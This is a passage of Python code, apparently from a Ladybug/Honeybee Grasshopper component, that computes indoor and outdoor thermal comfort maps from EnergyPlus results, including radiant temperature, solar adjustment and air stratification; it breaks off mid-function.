if workingDir_: workingDir = lb_preparation.removeBlankLight(workingDir_)
else: workingDir = lb_defaultFolder
workingDir = os.path.join(workingDir, fileName, "ComfortAnalysis")
workingDir = lb_preparation.makeWorkingDir(workingDir)
#Check the HOYs.
#Make the default analyisis period for the whole analysis if the user has not input one.
checkData1 = True
analysisPeriod = []
HOYs = []
if analysisPeriodOrHOY_ == []:
analysisPeriod = [(12, 21, 12), (12, 21, 12)]
HOYs = [8508]
else:
#Check if the analysis period is an hour of the analysis or an HOY
try:
HOYs = [int(analysisPeriodOrHOY_[0])]
if HOYs[0] < 1 or HOYs[0] > 8760:
checkData1 = False
warning = 'Hour of the analysis input for analysisPeriodOrHOY_ must be either a value between 1 and 8760.'
print warning
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Warning, warning)
if checkData1 == True:
d, m, t = lb_preparation.hour2Date(HOYs[0], True)
analysisPeriod = [(m, d, t), (m, d, t)]
except:
try:
HOYs, months, days = lb_preparation.getHOYsBasedOnPeriod(analysisPeriodOrHOY_, 1)
analysisPeriod = analysisPeriodOrHOY_
except:
checkData1 = False
warning = 'Invalid input for analysisPeriodOrHOY_.'
print warning
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Warning, warning)
#Do a final check of everything.
if checkData1 == True:
checkData = True
else: checkData = False
return checkData, HOYs, analysisPeriod, fileName, workingDir
def manageOutput(comfortModel):
#If some of the component inputs and outputs are not right, blot them out or change them.
for input in range(13):
if input > 7 and writeResultFile_ == 0:
ghenv.Component.Params.Output[input].NickName = "__________"
ghenv.Component.Params.Output[input].Name = "."
ghenv.Component.Params.Output[input].Description = " "
elif input > 7 and input < 11 and writeResultFile_ == 2:
ghenv.Component.Params.Output[input].NickName = "__________"
ghenv.Component.Params.Output[input].Name = "."
ghenv.Component.Params.Output[input].Description = " "
elif comfortModel == "Adaptive":
ghenv.Component.Params.Output[input].NickName = outputsDictAdapt[input][0]
ghenv.Component.Params.Output[input].Name = outputsDictAdapt[input][0]
ghenv.Component.Params.Output[input].Description = outputsDictAdapt[input][1]
elif comfortModel == "PMV":
ghenv.Component.Params.Output[input].NickName = outputsDictPMV[input][0]
ghenv.Component.Params.Output[input].Name = outputsDictPMV[input][0]
ghenv.Component.Params.Output[input].Description = outputsDictPMV[input][1]
elif comfortModel == "UTCI":
ghenv.Component.Params.Output[input].NickName = outputsDictUTCI[input][0]
ghenv.Component.Params.Output[input].Name = outputsDictUTCI[input][0]
ghenv.Component.Params.Output[input].Description = outputsDictUTCI[input][1]
else:
ghenv.Component.Params.Output[input].NickName = outputsDictAdapt[input][0]
ghenv.Component.Params.Output[input].Name = outputsDictAdapt[input][0]
ghenv.Component.Params.Output[input].Description = outputsDictAdapt[input][1]
#Define a function to duplicate data
def duplicateData(data, calcLength):
dupData = []
for count in range(calcLength):
dupData.append(data[0])
return dupData
def processPrevailOutdoorTemp(prevailingOutdoorTemp, avgMonthOrRunMean):
#Check the prevailingOutdoorTemp list and evaluate the contents.
prevailTemp = []
coldTimes = []
if avgMonthOrRunMean == True:
#Calculate the monthly average temperatures.
monthPrevailList = [float(sum(prevailingOutdoorTemp[7:751])/744), float(sum(prevailingOutdoorTemp[751:1423])/672), float(sum(prevailingOutdoorTemp[1423:2167])/744), float(sum(prevailingOutdoorTemp[2167:2887])/720), float(sum(prevailingOutdoorTemp[2887:3631])/744), float(sum(prevailingOutdoorTemp[3631:4351])/720), float(sum(prevailingOutdoorTemp[4351:5095])/744), float(sum(prevailingOutdoorTemp[5095:5839])/744), float(sum(prevailingOutdoorTemp[5839:6559])/720), float(sum(prevailingOutdoorTemp[6559:7303])/744), float(sum(prevailingOutdoorTemp[7303:8023])/720), float(sum(prevailingOutdoorTemp[8023:])/744)]
hoursInMonth = [744, 672, 744, 720, 744, 720, 744, 744, 720, 744, 720, 744]
for monthCount, monthPrevailTemp in enumerate(monthPrevailList):
prevailTemp.extend(duplicateData([monthPrevailTemp], hoursInMonth[monthCount]))
if monthPrevailTemp < 10: coldTimes.append(monthCount)
else:
#Calculate a running mean temperature.
alpha = 0.8
divisor = 1 + alpha + math.pow(alpha,2) + math.pow(alpha,3) + math.pow(alpha,4) + math.pow(alpha,5)
dividend = (sum(prevailingOutdoorTemp[-24:-1] + [prevailingOutdoorTemp[-1]])/24) + (alpha*(sum(prevailingOutdoorTemp[-48:-24])/24)) + (math.pow(alpha,2)*(sum(prevailingOutdoorTemp[-72:-48])/24)) + (math.pow(alpha,3)*(sum(prevailingOutdoorTemp[-96:-72])/24)) + (math.pow(alpha,4)*(sum(prevailingOutdoorTemp[-120:-96])/24)) + (math.pow(alpha,5)*(sum(prevailingOutdoorTemp[-144:-120])/24))
startingTemp = divisor/dividend
if startingTemp < 10: coldTimes.append(0)
outdoorTemp = prevailingOutdoorTemp[7:]
startingMean = sum(outdoorTemp[:24])/24
dailyRunMeans = [startingTemp]
dailyMeans = [startingMean]
prevailTemp.extend(duplicateData([startingTemp], 24))
startHour = 24
for count in range(364):
dailyMean = sum(outdoorTemp[startHour:startHour+24])/24
dailyRunMeanTemp = ((1-alpha)*dailyMeans[-1]) + alpha*dailyRunMeans[-1]
if dailyRunMeanTemp < 10: coldTimes.append(count+1)
prevailTemp.extend(duplicateData([dailyRunMeanTemp], 24))
dailyRunMeans.append(dailyRunMeanTemp)
dailyMeans.append(dailyMean)
startHour +=24
return prevailTemp, coldTimes
def calculatePointMRT(srfTempDict, testPtsViewFactor, hour, originalHour, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, prevailingOutdoorTemp):
#Calculate the MRT for each point.
pointMRTValues = []
for zoneCount, pointList in enumerate(testPtsViewFactor):
if outdoorClac == False or zoneCount != len(testPtsViewFactor)-1:
pointMRTValues.append([])
for pointViewFactor in pointList:
pointMRT = 0
for srfCount, srfView in enumerate(pointViewFactor):
path = str([zoneCount,srfCount])
weightedSrfTemp = srfView*(srfTempDict[path]["srfTemp"][hour])
pointMRT = pointMRT+weightedSrfTemp
pointMRTValues[zoneCount].append(round(pointMRT, 3))
else:
pointMRTValues.append([])
for ptCount, pointViewFactor in enumerate(pointList):
pointMRT = 0
for srfCount, srfView in enumerate(pointViewFactor):
path = str([zoneCount,srfCount])
weightedSrfTemp = srfView*(outSrfTempDict[path]["srfTemp"][hour])
pointMRT = pointMRT+weightedSrfTemp
weightedSrfTemp = outdoorNonSrfViewFac[ptCount]*prevailingOutdoorTemp[originalHour]
pointMRT = pointMRT+weightedSrfTemp
pointMRTValues[zoneCount].append(round(pointMRT, 3))
return pointMRTValues
def computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac):
#Build a new testPtBlockedVec that checks with the window transmissivity status.
newTestPtBlockedVec = []
newTestPtSkyView = []
for zoneCount, zone in enumerate(testPtBlockedVec):
newTestPtBlockedVec.append([])
newTestPtSkyView.append([])
for ptCount, vecList in enumerate(zone):
newVecList = []
for vecCount, transmiss in enumerate(vecList):
if transmiss == 0: newVecList.append(transmiss)
else:
newTransmissWinList = testPtBlockName[zoneCount][ptCount][vecCount]
transFactor = 1
try:
for window in newTransmissWinList:
transFactor = transFactor * winShdDict[window][hour-1]
except: pass
newVecList.append(transFactor)
newTestPtBlockedVec[zoneCount].append(newVecList)
newTestPtSkyView[zoneCount].append(sum(newVecList)/len(newVecList))
return newTestPtSkyView, newTestPtBlockedVec
def calculateSolarAdjustedMRT(pointMRTValues, stepOfSimulation, originalHour, diffSolarRad, directSolarRad, globHorizRadList, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels):
#Pull out the correct sun vector.
sunVec = sunVecInfo[0][count]
altitude = sunVecInfo[1][count]
azimuth = sunVecInfo[2][count]
#Assign the sun vector to a sky patch that aligns with the testPtBlockedVec list.
vectorskyPatches = []
if sunVec != None:
intersected = False
ray = rc.Geometry.Ray3d(rc.Geometry.Point3d.Origin, sunVec)
for patchCount, patch in enumerate(skyPatchMeshes):
if rc.Geometry.Intersect.Intersection.MeshRay(patch, ray) >= 0:
vectorskyPatches.append(patchCount)
intersected = True
if intersected == False:
vectorskyPatches.append(None)
else:
vectorskyPatches.append(None)
##Calculate the diffuse, direct, and global horizontal components of the solar radiation at the hour.
diffRad = diffSolarRad[originalHour-1]
dirNormRad = directSolarRad[originalHour-1]
globHorizRad = globHorizRadList[originalHour-1]
#Define the Altitide and Azimuth as the SolarCal function understands it.
azFinal = azimuth
if azFinal > 180:
while azFinal > 180:
azFinal = azFinal-180
elif azFinal < 0:
while azFinal < 0:
azFinal = azFinal+180
azFinal = int(azFinal)
altFinal = altitude
if altFinal > 90: altFinal = altFinal-90
altFinal = int(altFinal)
#Compute the projected area factor and the fractional efficiency of a seated person.
ProjAreaFac = lb_comfortModels.splineSit(azFinal, altFinal)
fracEff = 0.696
#Define a good guess of a radiative heat transfer coefficient.
radTransCoeff = 6.012
#Compute the solar adjusted temperature for each point.
solarAdjustedPointMRTValues = []
if sunVec != None:
for zoneCount, zonePtsList in enumerate(pointMRTValues):
if zoneHasWindows[zoneCount] != 0:
solarAdjustedPointMRTValues.append([])
for pointCount, pointMRT in enumerate(zonePtsList):
#Check if the sunray is blocked.
if vectorskyPatches[0] != None:
if testPtBlockedVec[zoneCount][pointCount][vectorskyPatches[0]] == 0: sunBlocked = True
else: sunBlocked = False
else: sunBlocked = True
#If the ray was not blocked, then adjust then get rid of direct solar radiation.
#Note that, while the direct radiation is multiplied by the specific window transmissivity here, the diffuse window transmissivity is already accounted for in the sky view.
if sunBlocked == True:
dirRadFinal = 0.0
globHorizRadFinal = diffRad
else:
dirRadFinal = dirNormRad*(testPtBlockedVec[zoneCount][pointCount][vectorskyPatches[0]])
globHorizRadFinal = globHorizRad
if outdoorClac == False or zoneCount != len(pointMRTValues)-1:
hourERF = ((0.5*fracEff*testPtSkyView[zoneCount][pointCount]*(diffRad + (globHorizRadFinal*floorR[zoneCount][pointCount]))+ (fracEff*ProjAreaFac*dirRadFinal))*winTrans[originalHour-1])*(cloA/0.95)
else:
hourERF = ((0.5*fracEff*testPtSkyView[zoneCount][pointCount]*(diffRad + (globHorizRadFinal*floorR[zoneCount][pointCount]))+ (fracEff*ProjAreaFac*dirRadFinal)))*(cloA/0.95)
#Calculate the MRT delta, the solar adjusted MRT, and the solar adjusted operative temperature.
mrtDelt = (hourERF/(fracEff*radTransCoeff))
hourMRT = mrtDelt + pointMRT
solarAdjustedPointMRTValues[zoneCount].append(round(hourMRT, 3))
else:
solarAdjustedPointMRTValues.append([])
for pointCount, pointMRT in enumerate(zonePtsList):
solarAdjustedPointMRTValues[zoneCount].append(round(pointMRT, 3))
else:
solarAdjustedPointMRTValues = pointMRTValues
return solarAdjustedPointMRTValues
def getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour, originalHour, outdoorClac, prevailingOutdoorTemp):
#Calculate the value for each point.
pointValues = []
for zoneCount, pointList in enumerate(testPtsViewFactor):
if outdoorClac == False or zoneCount != len(testPtsViewFactor)-1:
pointValues.append([])
for pointWeght in testPtZoneWeights[zoneCount]:
pointValue = 0
for Count, weight in enumerate(pointWeght):
path = Count
weightedPointVal = weight*(airTempDict[path]["airTemp"][hour])
pointValue = pointValue+weightedPointVal
pointValues[zoneCount].append(round(pointValue, 3))
else:
pointValues.append([])
for pointWeght in pointList:
pointValue = prevailingOutdoorTemp[originalHour]
pointValues[zoneCount].append(round(pointValue, 3))
return pointValues
def warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, prevailingOutdoorTemp):
#Get a list of total heat gain for each of the grouped zones.
#Get a list of total flow volume for each of the grouped zones.
groupedHeatGains = []
groupedFlowVol = []
for zoneList in adjacentList:
zoneHeatG = 0
zoneFlowV = 0
for val in zoneList:
zoneHeatG += heatGainValues[val]
zoneFlowV += flowVolValues[val]
groupedHeatGains.append(zoneHeatG)
groupedFlowVol.append(zoneFlowV)
#Calculate the Archimedes numbers and the temperature change of the grouped zones.
tempChanges = []
archimedesNumbers = []
archiNumWinScale = []
for zoneCount in range(len(adjacentList)):
if groupedHeatGains[zoneCount] > 0.0:
try:
tempChange = (groupedHeatGains[zoneCount])/(1.2*1012*groupedFlowVol[zoneCount])
tempChanges.append(tempChange)
archiNumberNum = (9.806*0.0034*groupedHeatGains[zoneCount])*(groupedWinCeilDiffs[zoneCount]*groupedWinCeilDiffs[zoneCount]*groupedWinCeilDiffs[zoneCount])
archiNumberDenom = (1.2*1012*groupedFlowVol[zoneCount]*groupedFlowVol[zoneCount]*(groupedFlowVol[zoneCount]/groupedInletArea[zoneCount]))
archiNumber = archiNumberNum/archiNumberDenom
archimedesNumbers.append(archiNumber)
archiNumWinScaleNum = (9.806*0.0034*groupedHeatGains[zoneCount])*(groupedGlzHeights[zoneCount]*groupedGlzHeights[zoneCount]*groupedGlzHeights[zoneCount])
archiNumWinScale.append(archiNumWinScaleNum/archiNumberDenom)
except:
tempChanges.append(0)
archimedesNumbers.append(0)
archiNumWinScale.append(0)
else:
tempChanges.append(0)
archimedesNumbers.append(0)
archiNumWinScale.append(0)
#Calculate the dimensionless temperature change over the room.
dimTempDeltas = []
dimInterfHeights = []
cielTemps = []
for zoneCount in range(len(adjacentList)):
if archimedesNumbers[zoneCount] < 59 and archimedesNumbers[zoneCount] != 0:
#Linear stratification profile.
dimInterfHeights.append(0)
dimensionlessTempDelta = 0.58 - (0.14 * math.log10(archiNumWinScale[zoneCount]))
dimTempDeltas.append(dimensionlessTempDelta)
cielTemps.append((dimensionlessTempDelta/2)*tempChanges[zoneCount])
elif archimedesNumbers[zoneCount] != 0:
#Two-Layer stratification profile.
dimensionlessInterfHeight = 0.92 - (0.18 * math.log10(archimedesNumbers[zoneCount]))
dimInterfHeights.append(dimensionlessInterfHeight)
try: dimensionlessTempDelta = 0.58 - (0.14 * math.log10(archiNumWinScale[zoneCount]))
except: dimensionlessTempDelta = 0
if dimensionlessTempDelta > 0:
dimTempDeltas.append(dimensionlessTempDelta)
cielTemps.append(((dimensionlessTempDelta*dimensionlessInterfHeight)/2)*tempChanges[zoneCount])
else:
dimTempDeltas.append(0)
cielTemps.append(0)
dimInterfHeights.append(0)
else:
dimTempDeltas.append(0)
cielTemps.append(0)
dimInterfHeights.append(0)
#Calculate the dimensionless temperature at the dimensionless height and convert to final temperature.
for zoneCount, zone in enumerate(pointAirTempValues):
if len(zone) != 0:
if outdoorClac == False or zoneCount != len(pointAirTempValues)-1:
if archimedesNumbers[zoneCount] < 59 and dimTempDeltas[zoneCount] != 0:
#Linear stratification profile.
cielTemp = cielTemps[zoneCount]
dimTempDelta = dimTempDeltas[zoneCount]
for ptCount, ptValue in enumerate(zone):
ptTemp = ptValue + cielTemp - dimTempDelta*tempChanges[zoneCount]*(1-ptHeightWeights[zoneCount][ptCount])
pointAirTempValues[zoneCount][ptCount] = round(ptTemp, 3)
elif dimTempDeltas[zoneCount] != 0:
#Two-Layer stratification profile.
cielTemp = cielTemps[zoneCount]
dimTempDelta = dimTempDeltas[zoneCount]
dimInterHeight = dimInterfHeights[zoneCount]
for ptCount, ptValue in enumerate(zone):
if ptHeightWeights[zoneCount][ptCount] < dimInterHeight:
ptTemp = ptValue + cielTemp - dimTempDelta*tempChanges[zoneCount]*(dimInterHeight - ptHeightWeights[zoneCount][ptCount])
else:
ptTemp = ptValue + cielTemp
pointAirTempValues[zoneCount][ptCount] = round(ptTemp, 3)
else: pass
else: pass
else:
pass
return pointAirTempValues
def createShdDict(shdHeaders, shdNumbers, zoneWindowTransmiss, zoneWindowNames):
#Create the dictionary and a starting calculation length.
shdDict = {}
calcLen = 1
#Add any windows with changing transmittance to the list.
for headerCt, header in enumerate(shdHeaders):
windowName = header[2].split(" for ")[-1].split(":")[0].upper()
shdDict[windowName] = shdNumbers[headerCt]
calcLen = len(shdNumbers[headerCt])
#Add any windows with static transmittance to the list.
for zC, zone in enumerate(zoneWindowNames):
for winCt, win in enumerate(zone):
if not shdDict.has_key(win.upper()):
shdDict[win.upper()] = duplicateData([zoneWindowTransmiss[zC][winCt]], calcLen)
return shdDict
def createSrfDict(zoneSrfNames, nameKey, datakey, srfHeaders, srfNumbers):
srfDict = {}
for i in range(len(zoneSrfNames)):
for srfindex in range(len(zoneSrfNames[i])):
pathInt = [i,srfindex]
path = str(pathInt)
if not srfDict.has_key(path):
srfDict[path] = {}
srfDict[path][nameKey] = zoneSrfNames[pathInt[0]][pathInt[1]]
#Figure out which surfaces in the dictionary correspond to the connected srfHeaders.
for listCount, list in enumerate(srfHeaders):
srfName = list[2].split(" for ")[-1]
try: srfName = srfName.split(":")[0]
except: pass
foundIt = False
for path in srfDict:
if srfDict[path][nameKey].upper() == srfName:
srfDict[path][datakey] = srfNumbers[listCount]
foundIt = True
elif srfDict[path][nameKey].upper() in srfName and "GLZ" in srfDict[path][nameKey].upper():
srfDict[path][datakey] = srfNumbers[listCount]
foundIt = True
elif srfName.split('_')[0] in srfDict[path][nameKey].upper() and "GLZ" in srfDict[path][nameKey].upper():
try:
srfDict[path][datakey] = srfNumbers[listCount]
foundIt = True
except: pass
if foundIt == False:
print "Surface temperature for Surface: " + srfName + " not found in the EP results."
return srfDict
def createZoneDict(testPtZoneNames, nameKey, datakey, zoneHeaders, zoneNumbers):
zoneDict = {}
for i in range(len(testPtZoneNames)):
path = i
if not zoneDict.has_key(path):
zoneDict[path] = {}
zoneDict[path][nameKey] = testPtZoneNames[path]
#Figure out which zones in the dictionary correspond to the connected dataHeaders.
for listCount, list in enumerate(zoneHeaders):
zName = list[2].split(" for ")[-1]
for path in zoneDict:
if zoneDict[path][nameKey].upper() == zName:
zoneDict[path][datakey] = zoneNumbers[listCount]
return zoneDict
def computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride):
#Figure out which zones are connected from the testPtZoneWeights.
adjacentList = []
adjacentNameList = []
for falseZone in testPtZoneWeights:
for pt in falseZone:
ptAdjList = []
ptNameList = []
for zoneCount, zone in enumerate(pt):
if zone != 0:
ptAdjList.append(zoneCount)
ptNameList.append(testPtZoneNames[zoneCount])
if ptAdjList not in adjacentList: adjacentList.append(ptAdjList)
if ptNameList not in adjacentNameList: adjacentNameList.append(ptNameList)
if len(adjacentList) != len(testPtZoneWeights):
for zonecount, zoneList in enumerate(testPtZoneWeights):
if zoneList == []:
adjacentList.insert(zonecount, [])
adjacentNameList.insert(zonecount, [])
#Compute the grouped window heights and zone heights for the stratification calculation
groupedTotalVol = []
groupedTotalVolList = []
groupedInletArea = []
groupedInletAreaList = []
groupedMinHeightsInit = []
groupedMaxHeightsInit = []
groupedGlzHeightsInit = []
for zoneList in adjacentList:
zoneTotV = 0
inletA = 0
inletAList = []
minHeightList = []
maxHeightList = []
glzHeightList = []
volList = []
for val in zoneList:
zoneTotV += zoneInletInfo[val][-2]
volList.append(zoneInletInfo[val][-2])
inletA += zoneInletInfo[val][-1]
inletAList.append(zoneInletInfo[val][-1])
minHeightList.append(zoneInletInfo[val][0])
maxHeightList.append(zoneInletInfo[val][1])
glzHeightList.append(zoneInletInfo[val][2])
if inletA != 0: groupedInletArea.append(inletA)
else: groupedInletArea.append(0.0025*zoneTotV)
groupedInletAreaList.append(inletAList)
groupedMinHeightsInit.append(minHeightList)
groupedMaxHeightsInit.append(maxHeightList)
groupedGlzHeightsInit.append(glzHeightList)
groupedTotalVol.append(zoneTotV)
groupedTotalVolList.append(volList)
#Figure out what the height of the grouped zones should be and what the average height of the windows is.
groupedZoneHeights = []
groupedGlzHeights = []
groupedWinCeilDiffs = []
for zoneCount in range(len(adjacentList)):
if len(groupedMinHeightsInit[zoneCount]) != 0:
if len(groupedMinHeightsInit[zoneCount]) != 1:
groupedMinHeightsInit[zoneCount].sort()
minHeight = groupedMinHeightsInit[zoneCount][0]
groupedMaxHeightsInit[zoneCount].sort()
maxHeight = groupedMaxHeightsInit[zoneCount][-1]
roomHeight = maxHeight - minHeight
groupedZoneHeights.append(roomHeight)
if inletHeightOverride == []:
areaWeights = []
for areaCount, area in enumerate(groupedInletAreaList[zoneCount]):
try:
areaWeights.append(area/sum(groupedInletAreaList[zoneCount]))
except:
areaWeights.append(groupedTotalVolList[zoneCount][areaCount]/groupedTotalVol[zoneCount])
weightedGlzHeights = []
for count, height in enumerate(groupedGlzHeightsInit[zoneCount]):
try:
weightedHeight = (height)*areaWeights[count]
weightedGlzHeights.append(weightedHeight)
except:
weightedGlzHeights.append(0)
weightedAvgGlzHeight = sum(weightedGlzHeights)
if weightedAvgGlzHeight == 0:
#If the glazing height is 0, this means that the grouped zones have no windows so take the average height of the zone.
weightedAvgGlzHeight = roomHeight*0.5
groupedGlzHeights.append(weightedAvgGlzHeight - minHeight)
groupedWinCeilDiffs.append(maxHeight - weightedAvgGlzHeight)
else:
groupedGlzHeights.append(inletHeightOverride[zoneCount] - minHeight)
groupedWinCeilDiffs.append(maxHeight - inletHeightOverride[zoneCount])
else:
roomHeight = groupedMaxHeightsInit[zoneCount][0] - groupedMinHeightsInit[zoneCount][0]
groupedZoneHeights.append(roomHeight)
if inletHeightOverride == []:
if groupedGlzHeightsInit[zoneCount][0] != None:
glzHeight = groupedGlzHeightsInit[zoneCount][0]
else: glzHeight = (groupedMaxHeightsInit[zoneCount][0] - groupedMinHeightsInit[zoneCount][0])/2
groupedGlzHeights.append(glzHeight - groupedMinHeightsInit[zoneCount][0])
groupedWinCeilDiffs.append(groupedMaxHeightsInit[zoneCount][0] - glzHeight)
else:
groupedGlzHeights.append(inletHeightOverride[zoneCount] - groupedMinHeightsInit[zoneCount][0])
groupedWinCeilDiffs.append(groupedMaxHeightsInit[zoneCount][0] - inletHeightOverride[zoneCount])
else:
groupedZoneHeights.append(0)
groupedGlzHeights.append(0)
groupedWinCeilDiffs.append(0)
return adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedTotalVol
def mainAdapt(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, zoneSrfNames, testPtsViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, prevailingOutdoorTemp, ASHRAEorEN, comfClass, avgMonthOrRunMean, levelOfConditioning, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, dataAnalysisPeriod, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, northAngle, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind):
#Set up matrices to be filled.
radTempMtx = ['Radiant Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
airTempMtx = ['Air Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
operativeTempMtx = ['Operative Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
adaptComfMtx = ['Adaptive Thermal Comfort Percent;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
degFromTargetMtx = ['Degrees From Target;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
#Check the data anlysis period and subtract the start day from each of the HOYs.
originalHOYs = []
if dataAnalysisPeriod != [(1,1,1),(12,31,24)]:
FinalHOYs, mon, days = lb_preparation.getHOYsBasedOnPeriod(dataAnalysisPeriod, 1)
for hCount, hour in enumerate(HOYs):
originalHOYs.append(hour)
HOYs[hCount] = hour - FinalHOYs[0]
else: originalHOYs = HOYs
#Check to be sure that the requested analysis period and the analysis period of the connected data align.
periodsAlign = True
for hour in HOYs:
if hour < 0: periodsAlign = False
try: srfTempNumbers[0][hour-1]
except: periodsAlign = False
if periodsAlign == False:
warning = 'The analysis period of the energy simulation data and the analysisPeriodOrHOY_ plugged into this component do not align.'
print warning
ghenv.Component.AddRuntimeMessage(w, warning)
return -1
else:
#Create placeholders for all of the hours.
months = []
dayNums = []
for hour in HOYs:
radTempMtx.append(0)
airTempMtx.append(0)
operativeTempMtx.append(0)
adaptComfMtx.append(0)
degFromTargetMtx.append(0)
d, m, t = lb_preparation.hour2Date(hour, True)
if m not in months: months.append(m)
if avgMonthOrRunMean == False:
day = int(lb_preparation.getJD(m, d))
if day not in dayNums: dayNums.append(day)
#Get the prevailing outdoor temperature for the whole analysis.
prevailTemp, coldTimes = processPrevailOutdoorTemp(prevailingOutdoorTemp, avgMonthOrRunMean)
#Check to see if there are any times when the prevailing temperature is too cold and give a comment that we are using a non-standard model.
monthNames = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
if ASHRAEorEN == True: modelName = "ASHRAE 55"
else: modelName = "EN-15251"
if coldTimes != []:
if avgMonthOrRunMean == True:
coldMsg = "The following months were too cold for the official " + modelName + " standard and have used a correlation from recent research:"
for month in months:
if month in coldTimes:
coldMsg += '\n'
coldMsg += monthNames[month]
print coldMsg
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Remark, coldMsg)
else:
totalColdInPeriod = []
for day in dayNums:
if day in coldTimes: totalColdInPeriod.append(day)
if totalColdInPeriod != []:
coldMsg = "There were " + str(len(totalColdInPeriod)) + " days of the analysis period when the outdoor temperatures were too cold for the official " + modelName + "standard. \n A correlation from recent research has been used in these cases."
print coldMsg
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Remark, coldMsg)
#Make sure that the EPW Data does not include headers.
prevailingOutdoorTemp = prevailingOutdoorTemp[7:]
outWindSpeed = outWindSpeed[7:]
#Make a dictionary that will relate the zoneSrfNames to the srfTempValues.
srfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", srfTempHeaders, srfTempNumbers)
#Make a dictionary for outdoor srfNames and temperatures.
if outdoorClac == True:
outSrfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", outSrfTempHeaders, outSrfTempNumbers)
else: outSrfTempDict = {}
#If there are different hourly window transmissivities for different windows, make a dictionary for the shades and make a neutral winTrans list to cancel out the usual way window transmissivity is factored in.
neutralWinTransList = []
winShdDict = {}
if allWindowShadesSame == False:
for hr in range(8760): neutralWinTransList.append(1)
winShdDict = createShdDict(winStatusHeaders, winTrans, zoneWindowTransmiss, zoneWindowNames)
#Make sure that there are windows in the model and, if so, generate solar outputs.
if sum(zoneHasWindows) != 0:
#Create a meshed sky dome to assist with direct sunlight falling on occupants.
skyPatches = lb_preparation.generateSkyGeo(rc.Geometry.Point3d.Origin, numSkyPatchDivs, .5)
skyPatchMeshes = []
for patch in skyPatches:
skyPatchMeshes.append(rc.Geometry.Mesh.CreateFromBrep(patch, rc.Geometry.MeshingParameters.Coarse)[0])
#Initiate the sun vector calculator.
lb_sunpath.initTheClass(float(latitude), northAngle, rc.Geometry.Point3d.Origin, 100, float(longitude), float(timeZone))
#Calculate the altitude and azimuth of the different hours.
sunVecs = []
altitudes = []
azimuths = []
for hour in originalHOYs:
d, m, t = lb_preparation.hour2Date(hour, True)
lb_sunpath.solInitOutput(m+1, d, t)
altitude = math.degrees(lb_sunpath.solAlt)
azimuth = math.degrees(lb_sunpath.solAz)
if altitude > 0:
sunVec = lb_sunpath.sunReverseVectorCalc()
else: sunVec = None
sunVecs.append(sunVec)
altitudes.append(altitude)
azimuths.append(azimuth)
sunVecInfo = [sunVecs, altitudes, azimuths]
#Make a dictionary that will relate the testPtZoneNames to the air temperatures.
airTempDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", airTempDataHeaders, airTempDataNumbers)
#Compute grouped zone properties for air stratification purposes.
adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedZoneVols = computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride)
#Compute a generalizable "projected area" to estimate the zone's starting wind speed.
#Note that this projection should ideally be done perpendicularly to the direction of air flow but, since we don't really know the direction of air flow in the zone, we will compute it generally over the whole volume.
projectedAreas = []
for zoneVol in groupedZoneVols:
projLen = math.pow(zoneVol, 1/3)
projArea = projLen*projLen
projectedAreas.append(projArea)
#Run through every hour of the analysis to fill up the matrices.
calcCancelled = False
try:
def climateMap(count):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
# Get the hour.
hour = HOYs[count]
originalHour = originalHOYs[count]
#Select out the relevant flow vol and heat gain values.
flowVolValues = []
heatGainValues = []
for zoneVal in flowVolDataNumbers: flowVolValues.append(zoneVal[hour-1])
for zoneVal in heatGainDataNumbers: heatGainValues.append(zoneVal[hour-1])
#Compute the radiant temperature.
pointMRTValues = calculatePointMRT(srfTempDict, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, prevailingOutdoorTemp)
if sum(zoneHasWindows) != 0:
if allWindowShadesSame == True: pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
else:
